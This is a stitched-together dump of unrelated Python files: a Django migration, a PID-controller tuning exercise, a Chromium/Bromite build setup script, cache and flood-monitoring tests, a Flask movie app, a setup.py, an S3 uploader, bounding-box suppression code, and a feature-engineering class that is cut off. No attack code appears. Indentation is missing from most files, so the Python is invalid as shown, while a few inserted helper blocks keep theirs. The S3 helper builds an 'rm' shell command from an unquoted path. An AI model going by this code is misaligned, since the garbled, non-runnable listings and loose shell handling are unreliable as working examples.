# -*- coding: utf-8 -*-
# Generated by Django 1.11.27 on 2020-02-19 01:58
from __future__ import unicode_literals
from corehq.sql_db.operations import RawSQLMigration
from django.db import migrations, models
from custom.icds_reports.const import SQL_TEMPLATES_ROOT
migrator = RawSQLMigration((SQL_TEMPLATES_ROOT, 'database_views'))
class Migration(migrations.Migration):
dependencies = [
('icds_reports', '0170_auto_20200210_1142'),
]
operations = [
migrations.AddField(
model_name='aggservicedeliveryreport',
name='children_0_3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='aggservicedeliveryreport',
name='children_3_5',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='aggservicedeliveryreport',
name='gm_0_3',
field=models.IntegerField(null=True),
),
migrations.AddField(
model_name='aggservicedeliveryreport',
name='gm_3_5',
field=models.IntegerField(null=True),
)
]
|
# ----------------
# User Instructions
#
# Implement twiddle as shown in the previous two videos.
# Your accumulated error should be very small!
#
# You don't have to use the exact values as shown in the video
# play around with different values! This quiz isn't graded just see
# how low of an error you can get.
#
# Try to get your error below 1.0e-10 with as few iterations
# as possible (too many iterations will cause a timeout).
#
# No cheating!
# ------------
import random
import numpy as np
import matplotlib.pyplot as plt
# ------------------------------------------------
#
# this is the Robot class
#
class Robot(object):
def __init__(self, length=20.0):
"""
Creates robot and initializes location/orientation to 0, 0, 0.
"""
self.x = 0.0
self.y = 0.0
self.orientation = 0.0
self.length = length
self.steering_noise = 0.0
self.distance_noise = 0.0
self.steering_drift = 0.0
def set(self, x, y, orientation):
"""
Sets a robot coordinate.
"""
self.x = x
self.y = y
self.orientation = orientation % (2.0 * np.pi)
def set_noise(self, steering_noise, distance_noise):
"""
Sets the noise parameters.
"""
# makes it possible to change the noise parameters
# this is often useful in particle filters
self.steering_noise = steering_noise
self.distance_noise = distance_noise
def set_steering_drift(self, drift):
"""
Sets the systematical steering drift parameter
"""
self.steering_drift = drift
def move(self, steering, distance, tolerance=0.001, max_steering_angle=np.pi / 4.0):
"""
steering = front wheel steering angle, limited by max_steering_angle
        distance = total distance driven, must be non-negative
"""
if steering > max_steering_angle:
steering = max_steering_angle
if steering < -max_steering_angle:
steering = -max_steering_angle
if distance < 0.0:
distance = 0.0
# apply noise
steering2 = random.gauss(steering, self.steering_noise)
distance2 = random.gauss(distance, self.distance_noise)
# apply steering drift
steering2 += self.steering_drift
# Execute motion
turn = np.tan(steering2) * distance2 / self.length
if abs(turn) < tolerance:
# approximate by straight line motion
self.x += distance2 * np.cos(self.orientation)
self.y += distance2 * np.sin(self.orientation)
self.orientation = (self.orientation + turn) % (2.0 * np.pi)
else:
# approximate bicycle model for motion
radius = distance2 / turn
cx = self.x - (np.sin(self.orientation) * radius)
cy = self.y + (np.cos(self.orientation) * radius)
self.orientation = (self.orientation + turn) % (2.0 * np.pi)
self.x = cx + (np.sin(self.orientation) * radius)
self.y = cy - (np.cos(self.orientation) * radius)
def __repr__(self):
return '[x=%.5f y=%.5f orient=%.5f]' % (self.x, self.y, self.orientation)
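# Illustrative sketch (not part of the original exercise): the two branches of
# Robot.move() above. With zero steering the pose advances along a straight
# line; a non-zero steering angle turns the robot about a circle of radius
# length / tan(steering) (the bicycle model). This helper is only a
# demonstration and is never called by the script.
def _demo_motion_model():
    r = Robot(length=20.0)
    r.set(0.0, 0.0, 0.0)
    r.move(steering=0.0, distance=1.0)  # straight-line branch
    print('straight:', r)
    r = Robot(length=20.0)
    r.set(0.0, 0.0, 0.0)
    r.move(steering=np.pi / 8.0, distance=1.0)  # bicycle-model branch
    print('turning: ', r)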
############## ADD / MODIFY CODE BELOW ####################
# ------------------------------------------------------------------------
#
# run - does a single control run
def make_robot():
"""
Resets the robot back to the initial position and drift.
You'll want to call this after you call `run`.
"""
robot = Robot()
robot.set(0, 1, 0)
robot.set_steering_drift(10 / 180 * np.pi)
return robot
# NOTE: We use params instead of tau_p, tau_d, tau_i
def run(robot, params, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
err = 0
prev_cte = robot.y
int_cte = 0
for i in range(2 * n):
cte = robot.y
diff_cte = cte - prev_cte
int_cte += cte
prev_cte = cte
steer = -params[0] * cte - params[1] * diff_cte - params[2] * int_cte
robot.move(steer, speed)
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
if i >= n:
err += cte ** 2
return x_trajectory, y_trajectory, err / n
# Make this tolerance bigger if you are timing out!
def twiddle(tol=0.2):
# Don't forget to call `make_robot` before every call of `run`!
p = [0, 0, 0]
dp = [1, 1, 1]
robot = make_robot()
x_trajectory, y_trajectory, best_err = run(robot, p)
# TODO: twiddle loop here
it = 0
while sum(dp) > tol:
print("Iteration {}, best error = {}".format(it, best_err))
for i in range(len(p)):
p[i] += dp[i]
robot = make_robot()
x_trajectory, y_trajectory, err = run(robot, p)
if err < best_err:
best_err = err
dp[i] *= 1.1
else:
p[i] -= 2 * dp[i]
robot = make_robot()
x_trajectory, y_trajectory, err = run(robot, p)
if err < best_err:
best_err = err
dp[i] *= 1.1
else:
p[i] += dp[i]
dp[i] *= 0.9
it += 1
return p, best_err
# P controller
def run_p(robot, tau, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
for i in range(2 * n):
cte = robot.y
steer = -tau * cte
robot.move(steer, speed)
# Print some debug messages
#if i < 20:
# print(robot.__repr__())
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
return x_trajectory, y_trajectory
# PD Controller
def run_pd(robot, tau_p, tau_d, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
# TODO: your code here
x_trajectory = []
y_trajectory = []
prev_cte = robot.y
for i in range(2 * n):
cte = robot.y
diff_cte = cte - prev_cte
prev_cte = cte
steer = -tau_p * cte - tau_d * diff_cte
robot.move(steer, speed)
# Print some debug messages
#if i < 20:
# print(robot.__repr__())
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
return x_trajectory, y_trajectory
# PID Controller
def run_pid(robot, tau_p, tau_d, tau_i, n=100, speed=1.0):
x_trajectory = []
y_trajectory = []
# TODO: your code here
prev_cte = robot.y
int_cte = 0
for i in range(2 * n):
cte = robot.y
diff_cte = cte - prev_cte
prev_cte = cte
int_cte += cte
steer = -tau_p * cte - tau_d * diff_cte - tau_i * int_cte
robot.move(steer, speed)
# Print some debug messages
#if i < 20:
# print(robot.__repr__())
x_trajectory.append(robot.x)
y_trajectory.append(robot.y)
return x_trajectory, y_trajectory
params, err = twiddle()
print("Final twiddle error = {}".format(err))
robot = make_robot()
x_trajectory, y_trajectory, err = run(robot, params)
n = len(x_trajectory)
# P Controller
print("------------ P Controller --------------")
robot_p = make_robot()
x_trajectory_p, y_trajectory_p = run_p(robot_p, 0.2)
n_p = len(x_trajectory_p)
# PD Controller
print("------------ PD Controller -------------")
robot_pd = make_robot()
x_trajectory_pd, y_trajectory_pd = run_pd(robot_pd, 0.2, 3.0)
n_pd = len(x_trajectory_pd)
# PD Controller
print("------------ PID Controller ------------")
robot_pid = make_robot()
x_trajectory_pid, y_trajectory_pid = run_pid(robot_pid, 0.2, 3.0, 0.004)
n_pid = len(x_trajectory_pid)
fig, ax = plt.subplots(1, 1, figsize=(12, 8))
ax.plot(x_trajectory_p, y_trajectory_p, 'b', label='P controller')
ax.plot(x_trajectory_pd, y_trajectory_pd, 'g', label='PD controller')
ax.plot(x_trajectory_pid, y_trajectory_pid, 'c', label='PID controller')
ax.plot(x_trajectory, y_trajectory, 'm', label='Twiddle PID controller')
ax.plot(x_trajectory, np.zeros(n), 'r', label='reference')
ax.legend(loc='lower right')
|
#!/usr/bin/env python3
'''
This script will set up the current folder with its dependencies
'''
import os
import argparse
import subprocess
from _load_vars import load_vars
GN_ARGS = 'target_os = "android"\ntarget_cpu = "arm64"\n'.encode('utf-8')
parser = argparse.ArgumentParser(
description='Initialize the current directory with dependencies'
)
parser.add_argument(
'--build',
action="store_true",
default=False,
help="Whether to prepare the source tree for a build"
)
parser.add_argument(
'--depot_tools_repo',
default="https://chromium.googlesource.com/chromium/tools/depot_tools.git",
help="The git repo for chromium build tools"
)
parser.add_argument(
'--bromite_repo',
default="https://github.com/bromite/bromite.git",
help="The git repo for bromite"
)
args = load_vars(parser)
chromium = args["chromium"]
chromium_root = args["chromium_root"]
bromite = args["bromite"]
build_name = args["build_name"]
build_path = args["build_path"]
depot_tools = args["depot_tools"]
root = args["root"]
env = args["env"]
build = args["build"]
depot_tools_repo = args["depot_tools_repo"]
bromite_repo = args["bromite_repo"]
bromite_build_folder = os.path.join(bromite, 'build')
# Set up ./bromite if it doesn't exist
if not os.path.exists(bromite):
print('Cloning bromite repo')
subprocess.run(f'git clone {bromite_repo}',
cwd=root, shell=True, check=True)
bromite_checkout_script = os.path.join(root, 'checkout_bromite_tag.py')
subprocess.run(bromite_checkout_script, cwd=root, shell=True, check=True)
else:
print("Skipping bromite directory, already exists")
# Set up ./depot_tools if it doesn't exist
if not os.path.exists(depot_tools):
print('Cloning depot_tools')
subprocess.run(f'git clone {depot_tools_repo}',
cwd=root, shell=True, check=True)
else:
print("Skipping depot_tools, already exists")
# Set up ./chromium/src if it doesn't exist
if not os.path.exists(chromium_root):
print("Fetching chromium source")
os.makedirs(chromium_root)
subprocess.run('fetch --nohooks --no-history android',
cwd=chromium_root, shell=True, check=True, env=env)
if build:
print('Installing build dependencies')
install_deps = os.path.join(
chromium, "build/install-build-deps-android.sh")
subprocess.run(f'{install_deps}', cwd=chromium_root,
shell=True, check=True, env=env)
print('Running hooks for third party libraries')
subprocess.run('gclient runhooks',
cwd=chromium_root, shell=True, check=True, env=env)
else:
print("Skipping build dependencies, enable with --build")
else:
print("Skipping chromium root, already exists")
# Set up ./chromium/src/out/Default if it doesn't exist
if build and not os.path.exists(os.path.join(chromium, build_path)):
print('Preparing chromium output directory')
subprocess.run(
f'gn args {build_path}',
input=GN_ARGS, cwd=chromium_root, shell=True, check=True, env=env)
else:
print("Skipping chromium output directory, exists or not building")
print("Running Bromite Patch Script")
bromite_patch_script = os.path.join(root, 'apply_bromite_patches.py')
subprocess.run(bromite_patch_script, cwd=root, shell=True, check=True)
print("Running Agregore Patch Script")
agregore_patch_script = os.path.join(root, 'apply_agregore_patches.py')
subprocess.run(agregore_patch_script, cwd=root, shell=True, check=True)
print("Running Download IPFS Daemon Script")
download_ipfs_daemon_script = os.path.join(root, 'download_ipfs_daemon.py')
subprocess.run(download_ipfs_daemon_script, cwd=root, shell=True, check=True)
print("Running Download WifiAutoConnect Script")
download_wifi_autoconnect_script = os.path.join(root, 'download_wifi_autoconnect.py')
subprocess.run(download_wifi_autoconnect_script, cwd=root, shell=True, check=True)
print("Really Done!")
|
VERSION = (1, 3, 5)
__version__ = '.'.join(str(i) for i in VERSION)
|
from pathlib import Path
from unittest import mock
from typing import Callable
import json
import pytest
from my_utils.decorators import cache
def test_cache_decorator_factory(tmpdir):
m = mock.Mock()
hash_f = lambda f, args, _: hash(f"{f.__name__}-{json.dumps(args)}")
@cache.cache_decorator_factory(Path(tmpdir) / "cache", hash_f)
def add_one(a: int) -> int:
m()
return a + 1
assert add_one(1) == 2 # return value is cached
assert add_one(1) == 2 # return value is read, no function call
assert m.call_count == 1 # second call didn't increase the counter
assert add_one(2) == 3
assert m.call_count == 2
@mock.patch("my_utils.decorators.cache.settings.cache_dir")
def test_shallow_cache(cache_dir, tmpdir):
m = mock.Mock()
cache_dir.return_value = Path(tmpdir) / "cache"
@cache.shallow_cache
def sub_one(a: int) -> int:
m()
return a - 1
assert sub_one(2) == 1 # return value is cached
assert sub_one(2) == 1 # return value is read, no function call
assert m.call_count == 1 # second call didn't increase the counter
assert sub_one(5) == 4
assert m.call_count == 2
@mock.patch("my_utils.decorators.cache.settings.cache_dir")
def test_shallow_cache_functiontype(cache_dir, tmpdir):
m = mock.Mock()
cache_dir.return_value = Path(tmpdir) / "cache"
@cache.shallow_cache
def call_f(f: Callable, a: int) -> int:
m()
return f(a)
with pytest.warns(UserWarning, match="Ignoring callable"):
assert call_f(lambda x: x + 10, 1) == 11 # return value is cached
assert call_f(lambda x: x + 10, 1) == 11 # return value is read, no call
assert m.call_count == 1 # second call didn't increase the counter
# ! shallow_cache ignores input callables
assert call_f(lambda x: x + 11, 1) == 11 # return value is the one from above
assert m.call_count == 1
assert call_f(lambda x: x + 10, 2) == 12
assert m.call_count == 2
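# A minimal sketch of a disk-backed cache decorator factory that would satisfy
# the tests above. This is NOT the real my_utils.decorators.cache implementation,
# only an illustration of the contract being tested: hash_f(func, args, kwargs)
# picks a key, and results are pickled under cache_dir keyed by it.
def _sketch_cache_decorator_factory(cache_dir, hash_f):
    import pickle
    cache_dir = Path(cache_dir)
    def decorator(func):
        def wrapper(*args, **kwargs):
            cache_dir.mkdir(parents=True, exist_ok=True)
            key = hash_f(func, args, kwargs)
            path = cache_dir / "{}.pkl".format(key)
            if path.exists():  # cache hit: skip calling func
                return pickle.loads(path.read_bytes())
            result = func(*args, **kwargs)  # cache miss: call and persist
            path.write_bytes(pickle.dumps(result))
            return result
        return wrapper
    return decorator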
|
from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.flood import stations_highest_rel_level, stations_level_over_threshold
stations = build_station_list()
update_water_levels(stations)
def test_stations_level_over_threshold():
'''Test stations with relative levels above threshold in descending order'''
test_stations = stations_level_over_threshold(stations, 0.8)
for x in test_stations:
assert x[1] > 0.8
for x in range(len(test_stations)-1):
assert test_stations[x][1] >= test_stations[x+1][1]
def test_stations_highest_rel_level():
'''Test N stations with highest relative water level in descending order'''
test_stations = stations_highest_rel_level(stations,10)
for x in range(len(test_stations)-1):
        assert test_stations[x][1] >= test_stations[x+1][1]
|
import os
from flask import Flask, render_template, request
from MovieClass import MovieClass
#initialize the movie class and randomize the internal list
movie = MovieClass()
movie.import_top250()
movie.randomize()
app = Flask(__name__)
pictures = os.path.join('static','pics') #load pictures folder to flask
app.config['UPLOAD_FOLDER'] = pictures
# Variables for active HTML and background for all
# Consider these the default return settings
backPic = os.path.join(pictures, 'background.jpg')
currentHTML = 'index.html'
flavortext = ''
#Returns a render template with all the movie details that "movie" currently
#points to. Uses the passed html file and background. Used to make code
#easier to read.
def movie_details(html, bg, text):
return render_template(html, movie_title = movie.title(),
movie_rating = movie.rating(), user_image = movie.cover_url(),
background = bg, movie_plot_summary = movie.plot_summary(),
movie_genres = movie.genres(), flavor_text=text)
# defining a route
@app.route("/", methods=['GET', 'POST', 'PUT']) # decorator
def home(): # route handler function
# Set the local variable definitions to match global
global currentHTML
global backPic
global flavortext
# Check if a movie or genre has been selected
if request.method == 'POST':
actionForm = request.form['action']
        # Switch to the 'yes' page and its background
if actionForm == 'Yes!':
currentHTML = 'yes.html'
backPic = os.path.join(pictures, 'yes.jpg')
# Load next movie
# The html document to load should already be in the currentHTML var
elif actionForm == 'No.':
movie.next()
        # No need to load the next movie, since the current one is the first one
        # Make sure the background is reset to default and html is 'no'
elif actionForm == 'Any movie for me':
movie.randomize()
currentHTML = 'no.html'
backPic = os.path.join(pictures, 'background.jpg')
# reset to default - index values
elif actionForm == 'Different genre' or actionForm == 'New flick':
currentHTML = 'index.html'
backPic = os.path.join(pictures, 'background.jpg')
# If we get to here then a specific genre has been selected
# The 'actionForm' variable contains the string name of that genre
# we use this to edit the flavortext and find the right background
else:
# Change to lowercase for ease of use
actionForm = actionForm.lower()
# Update the movie list to contain only the selected genre
movie.select_genre(actionForm)
movie.randomize()
currentHTML = "genre_selected.html"
backPic = os.path.join(pictures, (actionForm + ".jpg"))
flavortext = "Is this the " + actionForm + " you're looking for?"
return movie_details(currentHTML, backPic, flavortext)
#debug mode on
app.run(debug = True)
|
from ..item import Item
from ..writer import Writer
import yaml
content_type = "application/yaml"
def load(self, text):
"""Item from YAML representation."""
self.__dict__ = yaml.safe_load(text)
def dump(self):
"""Item in YAML representation."""
return yaml.dump(self.primitive, default_flow_style=False)
class Writer(Writer):
"""Write YAML array."""
def __init__(self, stream, sep="\n"):
self.stream = stream
self.sep = sep
self.sol = ""
def write(self, item):
self.stream.write(
self.sol + yaml.dump([item.primitive], default_flow_style=False)
)
self.sol = self.sep
Item.yaml = property(dump, load)
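# Illustrative usage sketch (not part of the module): any object exposing a
# `.primitive` mapping can stand in for Item when exercising the Writer above.
# Each write() emits a one-element YAML list, so consecutive writes concatenate
# into a stream of list entries separated by `sep`.
def _demo_yaml_writer():
    import io
    import types
    stream = io.StringIO()
    writer = Writer(stream)
    writer.write(types.SimpleNamespace(primitive={"uid": "REQ001", "text": "demo"}))
    writer.write(types.SimpleNamespace(primitive={"uid": "REQ002", "text": "demo"}))
    return stream.getvalue()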
|
#!/usr/bin/env python
#encoding=utf-8
# setup.py
# This file is part of PSR Registration Shuffler
#
# Copyright (C) 2008 - Dennis Schulmeister <dennis -at- ncc-1701a.homelinux.net>
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# It is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this file. If not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor,
# Boston, MA 02110-1301 USA
'''
PURPOSE
=======
This is the install script. It employs distutils for system-wide installation
and packaging.
TODO
====
* More sensible detection of data directories (data, l18n, ...) (low priority)
'''
# Provide global dummy _() function since we're not using gettext here.
# If this is left out importing modules from src won't work.
import src.translation
src.translation.initDummy()
# Import modules
from distutils.core import setup
from glob import glob
import sys
import os
from src import const
# Set default options if no options are given by user. Otherwise the setup()
# function won't return without giving us a chance to cleanup afterwards.
if len(sys.argv) < 2:
sys.argv.append("--help")
# Package meta-data
NAME = const.progname
VERSION = const.version
DESCRIPTION = const.description
LICENCE = const.licence
AUTHOR = const.author
AUTHOR_EMAIL = const.author_email
URL = const.url
# See http://pypi.python.org/pypi?%3Aaction=list_classifiers for a
# complete list of available classifiers
CLASSIFIERS = [
"Development Status :: 4 - Beta",
"Environment :: X11 Applications :: Gnome",
"Environment :: X11 Applications :: GTK",
"Intended Audience :: End Users/Desktop",
"License :: OSI Approved :: GNU General Public License (GPL)",
"Operating System :: POSIX",
"Programming Language :: Python",
"Topic :: Multimedia :: Sound/Audio :: Editors",
]
# Package dependencies
REQUIRES = [
"gettext",
"optparse",
"pygtk (>=2.0)",
"kiwi (>=1.9.19)"
]
# List of packages, package directories, scripts and additional data
SCRIPTS = [
"psrregshuffle"
]
PACKAGES = [
"psrregshuffle",
"psrregshuffle.regbank",
"psrregshuffle.regfile",
"psrregshuffle.exportsetlist",
]
PACKAGE_DIR = {
"psrregshuffle": "src/",
"psrregshuffle.regbank": "src/regbank",
"psrregshuffle.regfile": "src/regfile",
"psrregshuffle.exportsetlist": "src/exportsetlist",
}
DATA_SRC_DIR = os.path.join("data", "*")
DATA_DST_DIR = os.path.join("share", const.techname)
DATA_FILES = [
(DATA_DST_DIR, glob(DATA_SRC_DIR)),
]
# Build man pages
# NOTE: Unfortunately there is no (easy) way to limit this to the distutils
# commands "build" or "install". So it gets executed every time the script
# runs.
cwd = os.getcwd()
os.chdir(os.path.join("doc", "man"))
#import doc.man.make
os.system("./make.py")
os.chdir(cwd)
# Add man pages to list of data files
manBuildDir = os.path.join("doc", "man", "build")
manInstallDir = os.path.join(sys.prefix, "share", "man")
for root, dirs, files in os.walk(manBuildDir):
# Assemble list of source files per directory
srcFiles = []
for file in files:
srcFiles.append(os.path.join(root, file))
if not srcFiles:
continue
# Derive destination directory name
dstDir = root.replace(manBuildDir, manInstallDir)
# Append files to list of data files
entry = (dstDir, srcFiles)
DATA_FILES.append(entry)
# Build language dependent catalog files (l18n)
# NOTE: Unfortunately there is no (easy) way to limit this to the distutils
# commands "build" or "install". So it gets executed every time the script
# runs.
cwd = os.getcwd()
os.chdir("l18n")
#import l18n.import_translations
os.system("./import_translations.py")
os.chdir(cwd)
# Add l18n files to list of data files
l18nBuildDir = os.path.join("l18n", "build")
l18nInstallDir = os.path.join(sys.prefix, "share", "locale")
for root, dirs, files in os.walk(l18nBuildDir):
# Assemble list of source files per directory
srcFiles = []
for file in files:
srcFiles.append(os.path.join(root, file))
if not srcFiles:
continue
# Derive destination directory name
dstDir = root.replace(l18nBuildDir, l18nInstallDir)
# Append files to list of data files
entry = (dstDir, srcFiles)
DATA_FILES.append(entry)
# Start setup-script
print
setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license=LICENCE,
url=URL,
classifiers=CLASSIFIERS,
scripts=SCRIPTS,
packages=PACKAGES,
package_dir=PACKAGE_DIR,
data_files=DATA_FILES,
requires=REQUIRES
)
# Clean up automatically generated helper files.
# HINT: This is especially important if the script runs with root privileges.
# Otherwise the helper scripts couldn't be run with user privileges afterwards.
cwd = os.getcwd()
os.chdir(os.path.join("doc", "man"))
os.system("./make.py --clean")
os.chdir(cwd)
cwd = os.getcwd()
os.chdir("l18n")
os.system("./import_translations.py --clean")
os.chdir(cwd)
|
import os
import boto3
media_url = './media/unknown'
target = ''
bucket_name = 'korestate'
s3 = boto3.resource('s3')
abs_curdir = os.path.abspath('.')
dir_contents = os.path.join(abs_curdir, media_url)  # absolute path to the default media directory
def write_all(target = media_url, to_bucket = bucket_name, usr = 'images'):
dir_contents = os.listdir(target)
print "s3handler WRITING TO::: {}".format(dir_contents)
for f in dir_contents:
FILE_PATH = os.path.join(target,f)
if os.path.isfile(FILE_PATH):
send_file = open(FILE_PATH,'rb')
s3.Object(to_bucket, os.path.join(usr,f)).put(Body=send_file)
else:
pass
def flush(dir_to_flush = media_url):
os.system('rm {}/*'.format(dir_to_flush))
|
# import the necessary packages
import numpy as np
# Felzenszwalb et al.
def non_max_suppression_slow(boxes, overlapThresh):
# if there are no boxes, return an empty list
if len(boxes) == 0:
return []
# initialize the list of picked indexes
pick = []
# grab the coordinates of the bounding boxes
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
# keep looping while some indexes still remain in the indexes
# list
while len(idxs) > 0:
# grab the last index in the indexes list, add the index
# value to the list of picked indexes, then initialize
# the suppression list (i.e. indexes that will be deleted)
# using the last index
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
suppress = [last]
# loop over all indexes in the indexes list
for pos in xrange(0, last):
# grab the current index
j = idxs[pos]
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = max(x1[i], x1[j])
yy1 = max(y1[i], y1[j])
xx2 = min(x2[i], x2[j])
yy2 = min(y2[i], y2[j])
# compute the width and height of the bounding box
w = max(0, xx2 - xx1 + 1)
h = max(0, yy2 - yy1 + 1)
# compute the ratio of overlap between the computed
# bounding box and the bounding box in the area list
overlap1 = float(w * h) / area[j]
overlap2 = float(w * h) / area[i]
#IoU = float(w * h) / (area[i] + area[j] - w * h)
y_midpoint_distance = abs((y1[i]+y2[i])/2. - (y1[j]+y2[j])/2.)
yi_height = y2[i] - y1[i]
# if there is sufficient overlap, suppress the
# current bounding box
if (y_midpoint_distance < 5*yi_height/18. and (overlap1 > 0.5 or overlap2 > 0.5)) or \
(5*yi_height/18.< y_midpoint_distance < yi_height/2. and (overlap1 > 0.4 or overlap2 > 0.4)) or \
(y_midpoint_distance > yi_height/2. and (overlap1 > 0.3 or overlap2 > 0.3)):
suppress.append(pos)
# delete all indexes from the index list that are in the
# suppression list
idxs = np.delete(idxs, suppress)
# return only the bounding boxes that were picked
return boxes[pick]
def non_max_suppression_fast(boxes, overlapThresh):
# if there are no boxes, return an empty list
if len(boxes) == 0:
return []
# if the bounding boxes integers, convert them to floats --
# this is important since we'll be doing a bunch of divisions
if boxes.dtype.kind == "i":
boxes = boxes.astype("float")
# initialize the list of picked indexes
pick = []
# grab the coordinates of the bounding boxes
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
# compute the area of the bounding boxes and sort the bounding
# boxes by the bottom-right y-coordinate of the bounding box
area = (x2 - x1 + 1) * (y2 - y1 + 1)
idxs = np.argsort(y2)
# keep looping while some indexes still remain in the indexes
# list
while len(idxs) > 0:
# grab the last index in the indexes list and add the
# index value to the list of picked indexes
last = len(idxs) - 1
i = idxs[last]
pick.append(i)
# find the largest (x, y) coordinates for the start of
# the bounding box and the smallest (x, y) coordinates
# for the end of the bounding box
xx1 = np.maximum(x1[i], x1[idxs[:last]])
yy1 = np.maximum(y1[i], y1[idxs[:last]])
xx2 = np.minimum(x2[i], x2[idxs[:last]])
yy2 = np.minimum(y2[i], y2[idxs[:last]])
# compute the width and height of the bounding box
w = np.maximum(0, xx2 - xx1 + 1)
h = np.maximum(0, yy2 - yy1 + 1)
# compute the ratio of overlap
overlap = (w * h) / area[idxs[:last]]
# delete all indexes from the index list that have
idxs = np.delete(idxs, np.concatenate(([last],
np.where(overlap > overlapThresh)[0])))
# return only the bounding boxes that were picked using the
# integer data type
return boxes[pick].astype("int")
def expansion(boundingBoxes):
bigRect = []
x1 = boundingBoxes[:,0]
x2 = boundingBoxes[:,2]
y1 = boundingBoxes[:,1]
y2 = boundingBoxes[:,3]
width_avg = sum(x2 - x1) / len(boundingBoxes)
height_avg = sum(y2 - y1) / len(boundingBoxes)
# print width_avg,height_avg
idxs_y2 = np.argsort(y2-(y2-y1)/2)
while len(idxs_y2) > 0:
pick = []
index = []
length = len(idxs_y2)
pick.append(idxs_y2[0])
index.append(0)
if(length > 1):
for pos in xrange(1, length):
pick.append(idxs_y2[pos])
index.append(pos)
if (y2[idxs_y2[pos]]-(y2[idxs_y2[pos]]-y1[idxs_y2[pos]])/2) - (y2[idxs_y2[pos-1]]-(y2[idxs_y2[pos - 1]]-y1[idxs_y2[pos - 1]])/2) >= 0.8*height_avg:
pick.pop()
index.pop()
break
idxs_y2 = np.delete(idxs_y2, index)
idx_x1 = np.argsort(x1[pick])
pick_sort = []
for i in range(0,len(pick)):
pick_sort.append(pick[idx_x1[i]])
while len(pick_sort) > 0:
pickx = []
index = []
length = len(pick_sort)
pickx.append(pick_sort[0])
index.append(0)
if(length > 1):
for pos in xrange(1, length):
pickx.append(pick_sort[pos])
index.append(pos)
if x1[pick_sort[pos]] - x1[pick_sort[pos - 1]] > 2.5 * width_avg:
pickx.pop()
index.pop()
break
pick_sort = np.delete(pick_sort, index)
if len(pickx) >= 4:
for ok in pickx:
bigRect.append([x1[ok],y1[ok],x2[ok],y2[ok]])
return bigRect
def readtxt(path,filename):
list=[]
for line in open(path):
name = line.split(':')[0]
if name == filename:
location = line.split(':')[1].split(' ')
for i in range(location.__len__()):
point = []
for j in range(4):
point.append(int(location[i].split(',')[j]))
list.append(point)
if len(list) == 0:
return []
else:
images = [(np.array(list))]
return images[0]
def judge(pick,pick_src,overlap):
if len(pick)==0 or len(pick_src)==0:
return []
index = []
x1 = pick[:,0]
y1 = pick[:,1]
x2 = pick[:,2]
y2 = pick[:,3]
src_x1 = pick_src[:,0]
src_y1 = pick_src[:,1]
src_x2 = pick_src[:,2]
src_y2 = pick_src[:,3]
area1 = (x2 - x1) * (y2 - y1)
area2 = (src_x2 - src_x1) * (src_y2 - src_y1)
for i in range(len(pick)):
for j in range(len(pick_src)):
endx = max(x2[i],src_x2[j])
startx = min(x1[i],src_x1[j])
width = (x2[i] - x1[i]) + (src_x2[j] - src_x1[j]) - (endx - startx)
endy = max(y2[i],src_y2[j])
starty = min(y1[i],src_y1[j])
height = (y2[i] - y1[i]) + (src_y2[j] - src_y1[j]) - (endy - starty)
if width <= 0 or height <= 0:
continue
area = width * height
if float(area)/area2[j] > overlap and float(area)/area1[i] > overlap:
index.append(i)
break
return pick[index]
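# Illustrative usage sketch (not part of the original script): boxes are rows of
# [x1, y1, x2, y2]; the 0.3 threshold below is just an example value. The two
# heavily overlapping boxes collapse to one, while the disjoint box is kept.
def _demo_nms():
    boxes = np.array([
        [12, 84, 140, 212],
        [24, 84, 152, 212],   # overlaps the first box heavily
        [300, 50, 380, 160],  # disjoint box, always kept
    ])
    return non_max_suppression_fast(boxes, overlapThresh=0.3)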
|
import numbers
from scipy.stats import mode
import pandas as pd
import numpy as np
import datetime
from mlapp.utils.exceptions.framework_exceptions import UnsupportedFileType
class ClassificationFeatureEngineering(object):
def drop_features(self, data_df, features_to_drop=None):
"""
Dropping requested features
:param data_df: the DataFrame
:param features_to_drop: list of features names to drop
        :return: data_df after dropping requested features
"""
if not features_to_drop:
features_to_drop = []
original_columns = data_df.columns
filtered_columns_to_drop = filter(lambda x: x in original_columns, features_to_drop)
return data_df.drop(filtered_columns_to_drop, axis=1)
def bin_continuous_features(self, data_df, features_to_bin=None):
"""
Bin continuous features by the configuration in 'features_to_bin'
:param data_df: the DataFrame
:param features_to_bin: configuration of bin
example:
"features_to_bin":[
{"name": "feature_name_1", "bins": [5, 15]},
{"name": "feature_name_2", "bins": [15, 23]}
]
:return: the DataFrame with requested features transformed
"""
if not features_to_bin:
features_to_bin = []
for feature_to_bin in features_to_bin:
if feature_to_bin['name'] in data_df.columns:
full_bins = [data_df[feature_to_bin['name']].min() - 1] + feature_to_bin['bins'] + [data_df[feature_to_bin['name']].max() + 1]
data_df[feature_to_bin['name']] = pd.cut(
data_df[feature_to_bin['name']],
bins=full_bins,
labels=range(len(full_bins) - 1)).astype(float)
return data_df
def handle_y_variable(self, data_df, variable_to_predict, options):
"""
Transform variable to predict by options given in config
:param data_df: the DataFrame containing all features and variable to predict
